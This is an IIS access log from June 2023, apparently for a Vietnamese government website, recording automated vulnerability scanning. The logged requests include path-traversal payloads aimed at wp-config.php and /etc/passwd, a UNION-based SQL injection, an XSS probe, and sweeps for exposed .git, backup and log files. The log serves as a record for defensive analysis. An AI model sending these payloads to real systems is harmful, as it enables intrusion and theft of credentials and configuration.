????
Current Path : C:/inetpub/logs/LogFiles/W3SVC18/ |
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex230627.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 00:01:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 00:01:01 103.153.214.94 GET /tree action=get 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 28 2023-06-27 00:10:57 103.153.214.94 GET /Reports/Pages/Folder.aspx - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 53 2023-06-27 00:11:04 103.153.214.94 GET /ReportServer/Pages/Folder.aspx - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 27 2023-06-27 00:17:29 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 46 2023-06-27 00:27:57 103.153.214.94 GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php dew_file=../../../../wp-config.php 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 36 2023-06-27 00:37:05 103.153.214.94 GET /.drone.yml - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 32 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 00:55:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 00:55:19 103.153.214.94 GET /siteadmin/ - 443 - 84.46.251.165 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.4+Mobile/15E148+Safari/604.1 - 200 0 0 210 2023-06-27 01:00:47 103.153.214.94 POST /jars/upload - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 36 2023-06-27 01:00:47 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpoc - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 11 0 26 2023-06-27 01:03:17 103.153.214.94 GET /cs/career/getSurvey.jsp fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 32 2023-06-27 01:11:09 103.153.214.94 GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php href=../../../../wp-config.php 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 37 2023-06-27 01:20:09 103.153.214.94 GET /wp-config.php-backup - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 39 2023-06-27 01:20:09 103.153.214.94 GET /À - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 45 2023-06-27 01:24:49 103.153.214.94 GET /index.php q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19--+ 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 32 2023-06-27 01:31:58 103.153.214.94 GET /authenticate - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 34 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 01:50:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 01:50:31 103.153.214.94 POST / destination=node&q=node 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 32 2023-06-27 01:54:45 103.153.214.94 GET /api/v1/users/admin fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 0 2 43 2023-06-27 02:02:00 103.153.214.94 POST /index/gettunnel - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 31 2023-06-27 02:03:10 103.153.214.94 GET /siteadmin/login.php - 443 - 84.46.251.165 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/98.0.4758.109+Safari/537.36 - 200 0 0 222 2023-06-27 02:12:55 103.153.214.94 GET / {alert(document.domain)} 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 32 2023-06-27 02:21:00 103.153.214.94 GET /.git/config - 443 - 146.190.85.169 Mozilla/5.0+(Linux;+Android+10;+ELE-L29)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.61+Mobile+Safari/537.36 - 200 0 0 53 2023-06-27 02:22:45 103.153.214.94 GET /.git/config - 443 - 146.190.85.169 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.77+Safari/537.36 - 200 0 0 46 2023-06-27 02:25:57 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 274 2023-06-27 02:27:53 103.153.214.94 GET /MicroStrategyWS/happyaxis.jsp - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 33 2023-06-27 02:30:49 103.153.214.94 GET /src/redirect.php plugins[]=../../../../etc/passwd%00 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 31 2023-06-27 02:31:27 103.153.214.94 POST /login - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 31 2023-06-27 02:34:33 103.153.214.94 GET /access.php - 443 - 84.46.251.165 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+15_4_1+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+FxiOS/99.3++Mobile/15E148+Safari/605.1.15 - 200 0 0 221 2023-06-27 02:34:57 103.153.214.94 GET /.git/config - 443 - 146.190.85.169 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 72 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 03:02:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 03:02:03 103.153.214.94 GET /BBScan-404-existence-check - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 490 2023-06-27 03:02:03 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 30 2023-06-27 03:07:47 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_userstatus 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 34 2023-06-27 03:09:43 103.153.214.94 GET /usuario/ - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+7.0;+SM-N920C)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.61+Mobile+Safari/537.36 - 200 0 0 235 2023-06-27 03:11:49 103.153.214.94 GET /index.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 29 2023-06-27 03:15:37 103.153.214.94 POST /struts2-rest-showcase/orders/3 - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 46 2023-06-27 03:15:37 103.153.214.94 POST /orders/3 - 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 266 2023-06-27 03:20:25 103.153.214.94 GET /index.php s=/install/index/index 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 30 2023-06-27 03:21:17 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 168 2023-06-27 03:21:19 103.153.214.94 GET /BBScan-404-existence-check - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 704 2023-06-27 03:21:19 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 384 2023-06-27 03:21:19 103.153.214.94 GET /bcvt.kontum.gov.vn.zip - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 73 2023-06-27 03:21:19 103.153.214.94 GET /bcvt.kontum.gov.vn.rar - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 65 2023-06-27 03:21:19 103.153.214.94 GET /.git/HEAD - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 43 2023-06-27 03:21:19 103.153.214.94 GET /.svn/entries - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 43 2023-06-27 03:21:19 103.153.214.94 GET /bcvt.kontum.gov.vn.tar.gz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 64 2023-06-27 03:21:19 103.153.214.94 GET /ews/ - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 69 2023-06-27 03:21:19 103.153.214.94 GET /.git/config - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 69 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.kontum.gov.vn.tar.bz2 - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 59 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.kontum.gov.vn.tgz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 86 2023-06-27 03:21:20 103.153.214.94 GET /log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 60 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.kontum.gov.vn.7z - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 70 2023-06-27 03:21:20 103.153.214.94 GET /logs - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 53 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.kontum.gov.vn.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 70 2023-06-27 03:21:20 103.153.214.94 GET /_log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 51 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.kontum.gov.vn.sql - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 62 2023-06-27 03:21:20 103.153.214.94 GET /_logs - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 56 2023-06-27 03:21:20 103.153.214.94 GET /.git/index - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 87 2023-06-27 03:21:20 103.153.214.94 GET /accesslog - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 58 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.zip - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 77 2023-06-27 03:21:20 103.153.214.94 GET /errorlog - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 54 2023-06-27 03:21:20 103.153.214.94 GET /admin - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 301 0 0 205 2023-06-27 03:21:20 103.153.214.94 GET /access.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 50 2023-06-27 03:21:20 103.153.214.94 GET /www.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 57 2023-06-27 03:21:20 103.153.214.94 GET /admin/ - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 90 2023-06-27 03:21:20 103.153.214.94 GET /error.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 56 2023-06-27 03:21:20 103.153.214.94 GET /admin/ - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 75 2023-06-27 03:21:20 103.153.214.94 GET /log.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 53 2023-06-27 03:21:20 103.153.214.94 GET /bak - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 73 2023-06-27 03:21:20 103.153.214.94 GET /sql.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 54 2023-06-27 03:21:20 103.153.214.94 GET /errors.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 51 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.rar - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 372 2023-06-27 03:21:20 103.153.214.94 GET /backup - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 79 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.tar.gz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 91 2023-06-27 03:21:20 103.153.214.94 GET /conf - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 85 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.tar.bz2 - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 74 2023-06-27 03:21:20 103.153.214.94 GET /config - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 75 2023-06-27 03:21:20 103.153.214.94 GET /bcvt.tgz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 64 2023-06-27 03:21:20 103.153.214.94 GET /db - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 81 2023-06-27 03:21:21 103.153.214.94 GET /bcvt.7z - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 74 2023-06-27 03:21:21 103.153.214.94 GET /debug.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 332 2023-06-27 03:21:21 103.153.214.94 GET /debug - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 83 2023-06-27 03:21:21 103.153.214.94 GET /bcvt.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 72 2023-06-27 03:21:21 103.153.214.94 GET /db.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 56 2023-06-27 03:21:21 103.153.214.94 GET /data - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 83 2023-06-27 03:21:21 103.153.214.94 GET /bcvt.sql - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 64 2023-06-27 03:21:21 103.153.214.94 GET /install.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 59 2023-06-27 03:21:21 103.153.214.94 GET /database - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 83 2023-06-27 03:21:21 103.153.214.94 GET /server.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 65 2023-06-27 03:21:21 103.153.214.94 GET /admin/.svn/entries - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 301 0 0 70 2023-06-27 03:21:21 103.153.214.94 GET /sqlnet.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 64 2023-06-27 03:21:21 103.153.214.94 GET /deploy - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 69 2023-06-27 03:21:21 103.153.214.94 GET /WS_FTP.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 63 2023-06-27 03:21:21 103.153.214.94 GET /WEB-INF - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 78 2023-06-27 03:21:21 103.153.214.94 GET /database.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 71 2023-06-27 03:21:21 103.153.214.94 GET /install - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 77 2023-06-27 03:21:21 103.153.214.94 GET /manage - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 80 2023-06-27 03:21:21 103.153.214.94 GET /manager - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 70 2023-06-27 03:21:21 103.153.214.94 GET /admin.zip - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 380 2023-06-27 03:21:21 103.153.214.94 GET /monitor - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 70 2023-06-27 03:21:21 103.153.214.94 GET /admin.rar - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 79 2023-06-27 03:21:21 103.153.214.94 GET /admin.tar.gz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 73 2023-06-27 03:21:21 103.153.214.94 GET /data.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 358 2023-06-27 03:21:21 103.153.214.94 GET /admin.tar.bz2 - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 87 2023-06-27 03:21:21 103.153.214.94 GET /app.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 70 2023-06-27 03:21:21 103.153.214.94 GET /admin.tgz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 77 2023-06-27 03:21:22 103.153.214.94 GET /tmp - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 386 2023-06-27 03:21:22 103.153.214.94 GET /log.tar.gz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 365 2023-06-27 03:21:22 103.153.214.94 GET /admin.7z - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 384 2023-06-27 03:21:22 103.153.214.94 GET /admin.log - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 95 2023-06-27 03:21:22 103.153.214.94 GET /log.rar - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 81 2023-06-27 03:21:22 103.153.214.94 GET /temp - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 378 2023-06-27 03:21:22 103.153.214.94 GET /log.zip - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 85 2023-06-27 03:21:22 103.153.214.94 GET /test - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 101 2023-06-27 03:21:22 103.153.214.94 GET /log.tgz - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 80 2023-06-27 03:21:22 103.153.214.94 GET /log.tar.bz2 - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 81 2023-06-27 03:21:22 103.153.214.94 GET /log.7z - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 76 2023-06-27 03:21:22 103.153.214.94 GET /admin.sql - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 404 0 2 430 2023-06-27 03:21:22 103.153.214.94 GET /log.txt - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 78 2023-06-27 03:21:22 103.153.214.94 GET /logs.txt - 443 - 157.245.207.25 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/80.0.3987.122+Safari/537.36 - 206 0 0 116 2023-06-27 03:26:45 103.153.214.94 GET / - 443 - 45.117.82.231 